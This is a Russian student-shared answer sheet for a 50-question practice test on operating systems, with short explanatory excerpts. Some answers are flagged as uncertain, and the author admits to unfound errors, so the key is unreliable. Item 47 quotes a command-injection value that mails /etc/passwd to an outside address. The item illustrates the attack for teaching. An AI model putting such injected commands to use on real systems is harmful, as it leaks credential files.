Аттестационное тестирование в сфере профессионального  образования
  (весь юмор в том, что чиновники из Минобра пытаются проверить  через тесты спецдисциплину, в которой они "ни уха-ни рыла...", а  потому берется какой-нибудь ублюдочный курс и из него выдергиваются вопросы и  ответы, все хорошо, если читать именно этот курс, в остальном - вероятность  попадания 20-30%; я пошустрил по И-нету, нашел, как мне кажется, прообраз  - курс "Операционные системы, среды и оболочки" какого-то  южного (то ли ставропольского, то ли черкасского :-) педагогического  унивеситета (!!!), и на основании их мудрствований подготовил ответы, добавив  в "мутных" случаях комментарии из этого курса, Wiki и Googl-а)
   Это - ответы на репетиционный тест, надеюсь, что  основной не намного умнее. В вопросы добавлены названия разделов, приведены  все ответы, правильные выделены размером. По моему убеждению, чтобы пройти  тестирование, нормальному студенту достаточно накануне прочитать  два-три раза эту белиберду, память у вас еще прекрасная, что-то в ней  останется и этого будет достаточно для 40-50%-ного результата. (В конце есть  ряд вопросов по компьютерной безопасности, тема эта в курсе ОС не  рассматривается, да и то, что там представлено, - борьба с вирусами в  изложении для слабоумных, компьютерная безопасность - серьезная вещь, и не  нам, сирым и убогим, в ней разбираться :-).
  Успехов вам, М.А. 
  Приношу  свои извинения возможным читателям, в нижеприведенных ответах обнаружены  ошибки, которые постараюсь сейчас исправить.М.А. 30.08.12 - 19.00 (к  сожалению, одну ошибку все-таки так и не смог найти :-( , простите  ). 
   
  Специальность: 230101.65 – Вычислительные машины,  комплексы, системы и сети  Дисциплина: Операционные системы  Время выполнения теста: 90 минут  Количество заданий: 50
                |   ЗАДАНИЕ N 1 Назначение и функции  операционных систем ( - выберите  один вариант ответа)    Для сетевых операционных систем характерной является  функция обеспечения …
   |              |   1)
   |     прямого доступа к оперативной памяти другого компьютера
   |      
   |     2)
   |     взаимодействия  связанных между собой компьютеров
   |        |   3)
   |     обмена сигналами между выполняющимися на разных компьютерах  программами
   |      
   |     4)
   |     программных каналов между разными компьютерами
   |           
   |        |          
   |        |   ЗАДАНИЕ N 2 Операционная среда (  - выберите один вариант ответа)    Одна операционная система может поддерживать несколько …
   |              |   1)
   |     микропрограммных сред
   |      
   |     2)
   |     операционных систем
   |        |   3)
   |     микропрограммных систем
   |      
   |     4)
   |     операционных сред
   |           
   |        |   Операционная  система выполняет функции управления вычислительными процессами в  вычислительной системе, распределяет ресурсы вычислительной системы между  различными вычислительными процессами и образует программную среду,  в которой выполняются прикладные программы пользователя. Такая среда  называется операционной. Параллельное  существование терминов “операционная система” и “операционная среда”  вызвано тем, что операционная система может поддержать несколько  операционных сред.
         
   |             
        |   ЗАДАНИЕ N 3 Прерывания ( -  выберите один вариант ответа)    Термин "маскирование" означает запрет отдельных  …
   |              |   1)
   |     сигналов прерывания
   |      
   |     2)
   |     команд пользователя
   |        |   3)
   |     процессов пользователя
   |      
   |     4)
   |     команд процессора
   |           
   |        |          
   |        |   ЗАДАНИЕ N 4 Процессы и потоки (  - выберите один вариант ответа)    Для реализации синхронизации на уровне языка  программирования используются высокоуровневые примитивы, названные …
   |              |   1)
   |     супервизорами
   |      
   |     2)
   |     мониторами
   |        |   3)
   |     маркерами
   |      
   |     4)
   |     семафорами
   |         Монитор (по Ч.  Хоару) – высокоуровневая конструкция для синхронизации: многовходовый  модуль, содержащий описание общих данных и операций над ними в виде  процедур. Обеспечивается взаимное исключение исполнения мониторных  операций. Монитор может также содержать условные переменные, для которых  определены операции wait и signal для организации дополнительных очередей  процессов. Рассмотрено решение задачи "обедающие философы" с  использованием монитора. Описана реализация монитора и условных  переменных с помощью семафоров. 
   |        |          
   |             
        |   ЗАДАНИЕ N 5Файлы  и файловые системы ( - выберите  один вариант ответа)    Относительный путь к файлу состоит из списка каталогов,  которые нужно …
   |              |   1)
   |     пройти от рабочего  каталога, чтобы добраться до файла
   |      
   |     2)
   |     открыть в корневом процессе, чтобы добраться до файла
   |        |   3)
   |     добавить в переменную PATH операционной среды
   |      
   |     4)
   |     пройти от корневого каталога, чтобы добраться до файла
   |           
   |        |          
   |        |   ЗАДАНИЕ N 6 Память ( -  выберите один вариант ответа)    Свопингом сегментов называется перемещение …
   |              |   1)
   |     блоков файла между каталогами файловой системы
   |      
   |     2)
   |     блоков данных между процессом и ядром операционной  системы
   |        |   3)
   |     сегментов данных между стеком и оперативной памятью
   |      
   |     4)
   |     сегментов между  оперативной и внешней памятью
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 7 Пользователи (  - выберите один вариант ответа)    Идентификатор пользователя представляет собой уникальное  _______ значение
   |              |   1)
   |     составное
   |      
   |     2)
   |     символьное
   |        |   3)
   |     вещественное
   |      
   |     4)
   |     целое
   |           
   |        |          
   |        |   ЗАДАНИЕ N 8 Режимы работы (  - выберите один вариант ответа)    Мультитерминальный режим работы предполагает совмещение …
   |              |   1)
   |     привилегированного режима работы и режима пользователя
   |      
   |     2)
   |     многопроцессорного режима работы и режима ввода-вывода
   |        |   3)
   |     диалогового режима  работы и режима мультипрограммирования
   |      
   |     4)
   |     аналогового режима работы и режима микропрограммирования
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 9 Концепция процесса (  - выберите один вариант ответа)    Последовательная трансляция двух исходных программ  является …
   |              |   1)
   |     одним последовательным процессом
   |      
   |     2)
   |     двумя одинаковыми процессами
   |        |   3)
   |     двумя разными  процессами
   |      
   |     4)
   |     одной последовательной задачей
   |           
   |        |          
   |        |   ЗАДАНИЕ N 10 Идентификатор, дескриптор  и контекст процесса ( - выберите  несколько вариантов ответа)    Идентификатор процесса является частью _____________  процесса.
   |              |   1)
   |     контекста
   |      
   |     2)
   |     типа
   |        |   3)
   |     дескриптора !!!
   |      
   |     4)
   |     описателя
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 11 Иерархия процессов (  - выберите один вариант ответа)    В OS UNIX каждый новый процесс может быть образован  (порожден) только …
   |              |   1)
   |     двумя из существующих процессов
   |      
   |     2)
   |     несколькими родительскими процессами
   |        |   3)
   |     четным количеством родительских процессов
   |      
   |     4)
   |     одним из существующих  процессов
   |           
   |        |          
   |        |   ЗАДАНИЕ N 12 Диспетчеризация процессов (  - выберите один вариант ответа)    Основное различие между долгосрочным и краткосрочным  планированием (диспетчеризацией) заключается в …
   |              |   1)
   |     длительности выполнения
   |      
   |     2)
   |     очередности выполнения
   |        |   3)
   |     скорости выполнения
   |      
   |     4)
   |     частоте выполнения
   |           
   |        |   Планирование заданий используется в качестве долгосрочного планирования процессов. Оно отвечает за порождение новых  процессов в системе, определяя ее степень  мультипрограммирования, т. е. количество процессов, одновременно находящихся в ней. Если степень мультипрограммирования системы поддерживается постоянной, т.  е. среднее количество процессов в компьютере не меняется, то новые  процессы могут появляться только после завершения ранее загруженных.  Поэтому долгосрочное планирование осуществляется достаточно редко.
         
   |             
        |   ЗАДАНИЕ N 13 Понятия приоритета и  очереди процессов ( - выберите  один вариант ответа)    Приоритет, меняющейся во время исполнения процесса,  называется _____________ приоритетом.
   |              |   1)
   |     фиксированным
   |      
   |     2)
   |     циклическим
   |        |   3)
   |     статическим
   |      
   |     4)
   |     динамическим
   |           
   |        |          
   |        |   ЗАДАНИЕ N 14 Синхронизация процессов (  - выберите один вариант ответа)     При совместном использовании процессами аппаратных и  информационных ресурсов вычислительной системы возникает потребность в …
   |              |   1)
   |     адаптации
   |      
   |     2)
   |     синхронизации
   |        |   3)
   |     оптимизации
   |      
   |     4)
   |     буферизации
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 15 Средства обработки  сигналов ( - выберите один вариант ответа)    В операционной системе UNIX сигналы можно рассматривать  как простейшую форму взаимодействия между …
   |           
      |   1)
   |     процессами
   |      
   |     2)
   |     процессорами
   |        |   3)
   |     сегментами
   |      
   |     4)
   |     каналами
   |           
   |        |          
   |        |   ЗАДАНИЕ N 16 Понятие событийного  программирования ????? (  - выберите несколько вариантов ответа)     Область эффективного применения событийного  программирования начинается там, где возникают …
   |              |   1)
   |     трудности декомпозиции  решаемой задачи, при которой генерация и обработка рассматриваются как  объединенные процессы
   |      
   |     2)
   |     возможности декомпозиции решаемой задачи, при которой  генерация и обработка рассматриваются как объединенные процессы
   |        |   3)
   |     необходимость использования графа перехода между  состояниями
   |      
   |     4)
   |     неудобство  использования графа переходов между состояниями
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 17 Средства коммуникации  процессов ( - выберите один вариант ответа)    Два параллельных процесса могут быть …
   |              |   1)
   |     взаимоисключающими
   |      
   |     2)
   |     независимыми
   |        |   3)
   |     критическими
   |      
   |     4)
   |     коммутационными
   |           
   |        |          
   |        |   ЗАДАНИЕ N 18 Способы реализации  мультипрограммирования ( -  выберите один вариант ответа)    Главной целью мультипрограммирования в системах пакетной  обработки является …
   |              |   1)
   |     обеспечение удобства работы пользователей
   |      
   |     2)
   |     минимизация простоев  всех устройств компьютера
   |        |   3)
   |     минимизация времени выполнения одной задачи
   |      
   |     4)
   |     обеспечение реактивности системы
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 19Организация памяти. Адресное пространство (  - выберите один вариант ответа)    Учет участков свободной памяти с помощью связного списка  свободных/занятых блоков позволяет …
   |              |   1)
   |     находить в памяти наиболее долго занятые участки
   |      
   |     2)
   |     выделять участки  памяти произвольных размеров
   |        |   3)
   |     освобождать память, занятую неактивными процессами
   |      
   |     4)
   |     перемещать процессы в памяти
   |           
   |        |          
   |        |   ЗАДАНИЕ N 20 Методы управления памятью (  - выберите один вариант ответа)    Использование виртуальной памяти в однопрограммном режиме  приводит к … процесса, если размер программы существенно больше  объема доступной оперативной памяти
   |              |   1)
   |     аварийному завершению
   |      
   |     2)
   |     ускорению
   |        |   3)
   |     замедлению выполнения
   |      
   |     4)
   |     перезапуску
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 21 Принципы организации  виртуальной памяти ( - выберите  несколько вариантов ответа)    Виртуальная память позволяет …
   |              |   1)
   |     отказаться от предоставления прикладным процессам  оперативной памяти
   |      
   |     2)
   |     загружать множество  небольших программ, суммарный объем которых больше объема физической  памяти
   |        |   3)
   |     загружать программы,  размер которых превышает объем доступной физической памяти
   |      
   |     4)
   |     загружать программы, скомпилированные для другого  процессора
   |           
   |        |          
   |        |   ЗАДАНИЕ N 22 Сегментная организация  памяти ( - выберите один вариант ответа)    Сегментная организация памяти … отдельно скомпилированных  процедур.
   |              |   1)
   |     состоит из
   |      
   |     2)
   |     упрощает компоновку
   |        |   3)
   |     невозможна без
   |      
   |     4)
   |     усложняет компоновку
   |           
   |        |   Помимо простоты управления  увеличивающимися или сокращающимися структурами данных, сегментированная  память обладает и другими преимуществами.
  К ним относятся: простота  компоновки отдельно скомпилированных процедур (обращение к начальной  точке процедуры осуществляется адресом вида (n,0), где n – номер  сегмента);
         
   |             
        |   ЗАДАНИЕ N 23 Страничная организация  памяти ( - выберите один вариант ответа)    При страничной организации памяти таблица страниц может  размещаться в …
   |              |   1)
   |     только в оперативной памяти
   |      
   |     2)
   |     в оперативной памяти и на диске
   |        |   3)
   |     только в процессоре
   |      
   |     4)
   |     в специальной быстрой  памяти процессора и в оперативной памяти
   |           
   |        |          
   |        |   ЗАДАНИЕ N 24 Ускорение работы  страничной памяти ( - выберите  один вариант ответа)    Страничная организация предназначена для …
   |              |   1)
   |     облегчения совместного использования процедур, библиотек  и массивов данных
   |      
   |     2)
   |     повышения уровня защиты программ и данных
   |        |   3)
   |     получения большого  адресного пространства без приобретения дополнительной физической  памяти
   |      
   |     4)
   |     логического разделения программ и данных
   |           
   |        |          
   |        |   ЗАДАНИЕ N 25 Принципы замещения  страниц ( - выберите один вариант ответа)    При страничном сбое и отсутствии свободных блоков  физической памяти операционная система должна …
   |              |   1)
   |     выбрать страницу-кандидат на удаление из памяти и  сохранить удаляемую страницу на диске
   |      
   |     2)
   |     выбрать  страницу-кандидат на удаление из памяти и сохранить удаляемую страницу  на диске, если она претерпела изменения
   |        |   3)
   |     выбрать страницу, которая не изменялась, и сохранить  удаляемую страницу на диске
   |      
   |     4)
   |     выбрать страницу-кандидат на удаление из памяти и  сохранить копию удаляемой страницы в таблице страниц
   |           
   |        |          
   |        |   ЗАДАНИЕ N 26 Алгоритмы замещения  страниц ( - выберите один вариант ответа)    Полная реализация алгоритма LRU (Least Recently Used) …
   |              |   1)
   |     теоретически невозможна
   |      
   |     2)
   |     возможна при использовании стековой организации таблицы  страниц
   |        |   3)
   |     возможна при условии построения таблицы страниц в виде  бинарных деревьев
   |      
   |     4)
   |     практически невозможна
   |           
   |        |   LRU - хороший, но труднореализуемый алгоритм. Необходимо  иметь связанный список всех страниц в памяти, в начале которого будут  хранится недавно использованные страницы. Причем этот список должен  обновляться при каждом обращении к памяти. Много времени нужно и на поиск  страниц в таком списке.
         
   |             
        |   ЗАДАНИЕ N 27 Прерывания от внешних  устройств ( - выберите один вариант ответа)    Запросы на ввод-вывод от супервизора задач или от  программных модулей самой операционной системы получает _____________  ввода-вывода.
   |              |   1)
   |     контроллер
   |      
   |     2)
   |     диспетчер
   |        |   3)
   |     супервизор
   |      
   |     4)
   |     процессор
   |           
   |        |   супервизор ввода-вывода получает  запросы на ввод-вывод от супервизора задач или от программных модулей  самой операционной системы
         
   |        |   ЗАДАНИЕ N 28 Классификация устройств  ввода-вывода ( - выберите один вариант ответа)    Мыши (в качестве устройства-указателя) относятся к _____________  устройствам ввода-вывода.
   |              |   1)
   |     позиционируемым
   |      
   |     2)
   |     символьным
   |        |   3)
   |     адресуемым
   |      
   |     4)
   |     блочным
   |           
   |        |   Другой тип устройств ввода-вывода  — символьные устройства. Они выдают или воспринимают поток символов, не  относящийся ни к какой блочной структуре. Они не являются адресуемыми и  не имеют никакой операции позиционирования. В качестве символьных  устройств могут рассматриваться принтеры, сетевые интерфейсы, мыши (в  качестве устройства-указателя)
         
   |             
        |   ЗАДАНИЕ N 29 Основные принципы  организации ввода-вывода ( -  выберите один вариант ответа)    Любые операции по управлению вводом-выводом объявляются …
   |              |   1)
   |     привилегированными
   |      
   |     2)
   |     универсальными
   |        |   3)
   |     приоритетными
   |      
   |     4)
   |     уникальными
   |           
   |        |          
   |        |   ЗАДАНИЕ N 30 Функции супервизора  ввода-вывода ( - выберите один вариант ответа)    Супервизор ввода-вывода инициирует операции ввода-вывода и  в случае управления вводом-выводом с использованием прерываний  предоставляет процессор …
   |              |   1)
   |     супервизору прерываний
   |      
   |     2)
   |     диспетчеру задач
   |        |   3)
   |     задаче пользователя
   |      
   |     4)
   |     супервизору программ
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 31 Режимы управления  вводом-выводом ( - выберите  один вариант ответа)    В режиме обмена с опросом готовности устройства  ввода-вывода используется _____________ центрального процессора.
   |              |   1)
   |     рационально время
   |      
   |     2)
   |     нерационально память
   |        |   3)
   |     нерационально время
   |      
   |     4)
   |     рационально память
   |           
   |        |          
   |        |   ЗАДАНИЕ N 32 Закрепление устройств,  общие устройства ввода-вывода ( -  выберите один вариант ответа)    Понятия «виртуального устройства» по отношению к понятию  «спулинга» …
   |              |   1)
   |     соотносится как часть и целое???
   |      
   |     2)
   |     является более широким!!
   |        |   3)
   |     является более узким
   |      
   |     4)
   |     тождественно
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 33 Основные системные  таблицы ввода-вывода ( -  выберите один вариант ответа)    Каждый элемент таблицы оборудования условно называется …
   |              |   1)
   |     UCB!!!
   |      
   |     2)
   |     USB
   |        |   3)
   |     DCB
   |      
   |     4)
   |     DRT
   |           
   |        |   Каждая ОС имеет свои таблицы  ввода/вывода, их состав (количество и назначение каждой таблицы) может  сильно отличаться. Первая таблица содержит информацию обо всех  устройствах ввода/вывода, подключенных к вычислительной системе,- таблица  оборудования (equipment table), а каждый элемент этой таблицы называется  UCB (unit control block, блок управления устройством ввода/вывода).  Вторая таблица предназначена для реализации принципа виртуализации  устройств ввода/вывода – независимости от устройства. Действительное  устройство, которое сопоставляется виртуальному (логическому), выбирается  супервизором с помощью таблицы описания виртуальных логических устройств  (DRT, device reference table). Назначение этой второй таблицы –  установление связи между виртуальными (логическими) устройствами и  реальными устройствами, описанными посредством первой таблицы  оборудования.
         
   |        |   ЗАДАНИЕ N 34 Синхронный и асинхронный  ввод-вывод ( - выберите один вариант ответа)    Для увеличения скорости выполнения приложений при необходимости  предлагается использовать _____________ ввод-вывод.
   |              |   1)
   |     асинхронный
   |      
   |     2)
   |     приоритетный
   |        |   3)
   |     автоматический
   |      
   |     4)
   |     синхронный
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 35 Организация внешней  памяти на магнитных дисках ( -  выберите один вариант ответа)    Программа, расположенная в главной загрузочной записи,  называется _____________ загрузчиком.
   |              |   1)
   |     системным
   |      
   |     2)
   |     внесистемным
   |        |   3)
   |     начальным
   |      
   |     4)
   |     локальным
   |           
   |        |   На жестком диске по физическому  адресу 0-0-1 располагается главная загрузочная
  запись (master boot record, MBR). В состав MBR входят:
   
  - внесистемный загрузчик  (non-system bootstrap - NSB);
  - таблица описания разделов диска (таблица разделов,  partition table, PT).
         
   |        |   ЗАДАНИЕ N 36 Кэширование операций  ввода-вывода при работе с накопителями на магнитных дисках (  - выберите один вариант ответа)    Простейшим вариантом ускорения дисковых операций чтения  данных можно считать использование двойной …
   |              |   1)
   |     кластеризации
   |      
   |     2)
   |     буферизации
   |        |   3)
   |     диспетчеризации
   |      
   |     4)
   |     приоритезации
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 37 Принципы построенияОС (  - выберите один вариант ответа)    Операционная система реального времени должна обеспечивать  …
   |              |   1)
   |     делегирование полномочий
   |      
   |     2)
   |     наследование  приоритетов
   |        |   3)
   |     пакетную обработку
   |      
   |     4)
   |     клонирование пользователей
   |           
   |          Требования, предъявляемые к среде  исполнения систем реального времени, следующие:
  - ядро с приоритетом на  обслуживание прерывания. Приоритет на прерывание означает, что готовый к  запуску процесс, обладающий некоторым приоритетом, обязательно имеет  преимущество в очереди по отношению к процессу с более низким  приоритетом, быстро заменяет последний и поступает на выполнение. Ядро  заканчивает любую сервисную работу, как только поступает задача с высшим  приоритетом.
  - диспетчер с приоритетом - дает  возможность разработчику прикладной программы присвоить каждому  загрузочному модулю приоритет, неподвластный системе. Присвоение  приоритетов используется для определения очередности запуска программ,  готовых к исполнению. Диспетчеризация, в основу которой положен принцип  присвоения приоритета, и наличие ядра с приоритетом на прерывание  позволяют . Если наступает событие с высшим приоритетом, система  прекращает обработку задачи с низшим приоритетом и отвечает на вновь  поступивший запрос.
  Мартин Тиммерман сформулировал следующие необходимые  требования для ОСРВ
    - ОС  должна быть многозадачной и допускающей вытеснение (preemptable), 
   - ОС  должна обладать понятием приоритета для потоков, 
   - ОС  должна поддерживать предсказуемые механизмы синхронизации, 
   - ОС  должна обеспечивать механизм наследования приоритетов, 
             
   |        |   ЗАДАНИЕ N 38 Ядро и ресурсы (  - выберите один вариант ответа)    К невыгружаемым относятся такие ресурсы, которые не могут  быть …
   |              |   1)
   |     загружены в память
   |      
   |     2)
   |     выгружены из памяти
   |        |   3)
   |     отобраны у процесса
   |      
   |     4)
   |     отобраны у процессора
   |           
   |        |   Выгружаемый ресурс - этот ресурс безболезненно можно забрать у процесса  (например: память).
  Невыгружаемый ресурс - этот  ресурс нельзя забрать у процесса без потери данных (например: принтер).
         
   |             
        |   ЗАДАНИЕ N 39 Интерфейсы операционных  систем ( - выберите один вариант ответа)    Интерфейс прикладного программирования предназначен для  использования прикладными программами …
   |              |   1)
   |     системных ресурсов  компьютера
   |      
   |     2)
   |     регистров общего назначения процессора
   |        |   3)
   |     интерпретатора команд пользователя
   |      
   |     4)
   |     адресного пространства процесса
   |           
   |        |   Практически все операционные  системы имеют API, с помощью которого программисты могут  создавать приложения для этой операционной системы. Главный API  операционных систем — это множество системных вызовов.
         
   |        |   ЗАДАНИЕ N 40 Классификация  операционных систем ( - выберите несколько  вариантов ответа)    По режиму обработки задач различают операционные системы,  обеспечивающие _________ режим
   |              |   1)
   |     мультипрограммный
   |      
   |     2)
   |     виртуальный
   |        |   3)
   |     однопрограммный
   |      
   |     4)
   |     многопользовательский???
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 41 Анализ угроз и  уязвимостей в операционных системах ( -  выберите один вариант ответа)    Угроза зомби реализуется с помощью … и заставляет  компьютер выполнять приказания других лиц.
   |              |   1)
   |     вызова утилит операционной системы
   |      
   |     2)
   |     диспетчера приложений
   |        |   3)
   |     вредоносных программ
   |      
   |     4)
   |     подбора пароля
   |           
   |        |   ботнет  или зомби-сеть – это сеть  компьютеров, зараженных вредоносной программой поведения Backdoor.  Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными  машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или  всей сетью целиком) без ведома пользователя.
         
   |        |   ЗАДАНИЕ N 42 Основы криптографии (  - выберите один вариант ответа)    Недостаток систем шифрования с секретным ключом состоит в  том, что …
   |              |   1)
   |     отправитель сообщения не может его расшифровать
   |      
   |     2)
   |     отправитель и  получатель должны иметь общий секретный ключ
   |        |   3)
   |     объем вычислений при дешифровании намного больше, чем  при шифровании
   |      
   |     4)
   |     объем вычислений при шифровании намного больше, чем при  дешифровании
   |           
   |        |   Эффективность систем с секретным ключом обусловлена вполне  приемлемым объемом вычислений, необходимых для шифрования или  дешифрования сообщения, но у них имеется серьезный недостаток: и  отправитель, и получатель должны владеть общим секретным ключом
         
   |             
        |   ЗАДАНИЕ N 43 Механизмы защиты (  - выберите один вариант ответа)    Объектами защиты в компьютерных системах могут быть …
   |          ВАРИАНТЫ ОТВЕТОВ:
      |   1)
   |     устройства отображения информации
   |      
   |     2)
   |     помещения
   |        |   3)
   |     сотрудники
   |      
   |     4)
   |     программы
   |           
   |        |   Объект защиты — информация, носитель информации или  информационный процесс, в отношении которых необходимо обеспечивать  защиту в соответствии с поставленной целью защиты информации.
         
   |        |   ЗАДАНИЕ N 44 Надежные вычислительные  системы ( - выберите один вариант ответа)    Политика принудительного управления доступом (mandatory  access control) возлагает полномочия по назначению прав доступа к файлам  и другим объектам на ...
   |          ВАРИАНТЫ ОТВЕТОВ:
      |   1)
   |     пользователей
   |      
   |     2)
   |     прикладную программу
   |        |   3)
   |     операционную систему
   |      
   |     4)
   |     руководителей  подразделений
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 45 Методы аутентификации (  - выберите один вариант ответа)    Защита зашифрованных паролей в UNIX взламывается путем …
   |              |   1)
   |     шифрования множества  потенциальных паролей открытым алгоритмом шифрования и поиска  совпадений в файле паролей
   |      
   |     2)
   |     привлечения инсайдеров в качестве сообщников
   |        |   3)
   |     расшифровки всех паролей после копирования файла паролей
   |      
   |     4)
   |     вычисления пароля путем свертки идентификатора  пользователя
   |           
   |        |          
   |        |   ЗАДАНИЕ N 46 Инсайдерские атаки (  - выберите один вариант ответа)    Лазейки в программах создаются …
   |              |   1)
   |     для облегчения отладки  программ или в противоправных целях
   |      
   |     2)
   |     только для противоправных целей
   |        |   3)
   |     для внедрения в программу постороннего кода
   |      
   |     4)
   |     только для облегчения отладки программ
   |           
   |        |   Лазейки (trapdoors). Лазейка представляет собой точку входа  в программу, благодаря чему открывается непосредственный доступ к  некоторым системным функциям. Лазейки обычно вставляют во время  проектирования системы. Системные программисты организуют их при отладке  программы, но по завершении ее разработки их надо устранить.
         
   |             
        |   ЗАДАНИЕ N 47 Внешние атаки (  - выберите один вариант ответа)    Программа, выполняющая копирование файла путем системного  вызова, запрашивает у пользователя имена файла-источника и  файла-приемника. Злоумышленник ввел в качестве имен файлов следующие  значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие  действия выполнит система?
   |              |   1)
   |     Скопирует файл aaa в bbb отправит файл bbb адресату  goofinator@mail.ru.
   |      
   |     2)
   |     Отправит файл aaa адресату goofinator@mail.ru.
   |        |   3)
   |     Скопирует текст aaa в файл паролей, относящийся к  пользователю с идентификатором goofinator@mail.ru.
   |      
   |     4)
   |     Скопирует файл aaa в  bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.
   |           
   |        |          
   |        |   ЗАДАНИЕ N 48 Вредоносные программы (  - выберите один вариант ответа)    Наиболее популярное применение ботнетов (сети зараженных  компьютеров) - это …
   |              |   1)
   |     организация сетевых азартных игр
   |      
   |     2)
   |     распространение пиратского контента
   |        |   3)
   |     рассылка коммерческого  спама
   |      
   |     4)
   |     хищение денег с кредитных карт
   |           
   |        |          
   |             
        |   ЗАДАНИЕ N 49 Троянские кони и вирусы (  - выберите один вариант ответа)    Перезаписывающий вирус заражает исполняемую программу  путем …
   |              |   1)
   |     записи кода вируса в тело зараженной программы после  каждого ее вызова
   |      
   |     2)
   |     перезаписи содержимого стека программы кодом вируса
   |        |   3)
   |     перезаписи служебных секторов дисков
   |      
   |     4)
   |     записи вируса на место кода  программы!!!
   |           
   |        |          
   |        |   ЗАДАНИЕ N 50 Средства защиты от  вредоносных программ ( -  выберите один вариант ответа)    Обнаружить зашифрованный вирус можно ...
   |              |   1)
   |     с помощью универсальной программы дешифрования
   |      
   |     2)
   |     по характерному поведению зараженной программы при  запуске
   |        |   3)
   |     по сигнатурам кода процедур  расшифровки вируса!!!
   |      
   |     4)
   |     по изменению размера программы
   |           
   |        |   Это вирусы-партизаны, которые попав в систему, сразу не дают  себя обнаружить и не вступают в активную фазу. Они выжидают нужное им  время, находясь в закодированном и безвредном состоянии, при этом  зачастую они остаются незамеченными сканерами антивирусов. Как только  наступает благоприятное для заражения файлов время, вирусы дешифруются,  выполняют свою «грязную работу» и снова кодируются. Различные методы  шифрования и упаковки вредоносных программ делают даже известные вирусы  не обнаруживаемыми антивирусным программным обеспечением. Для обнаружения  этих «замаскированных» вирусов требуется мощный механизм распаковки,  который может дешифровать файлы перед их проверкой
   
         
   |             
   |             
   |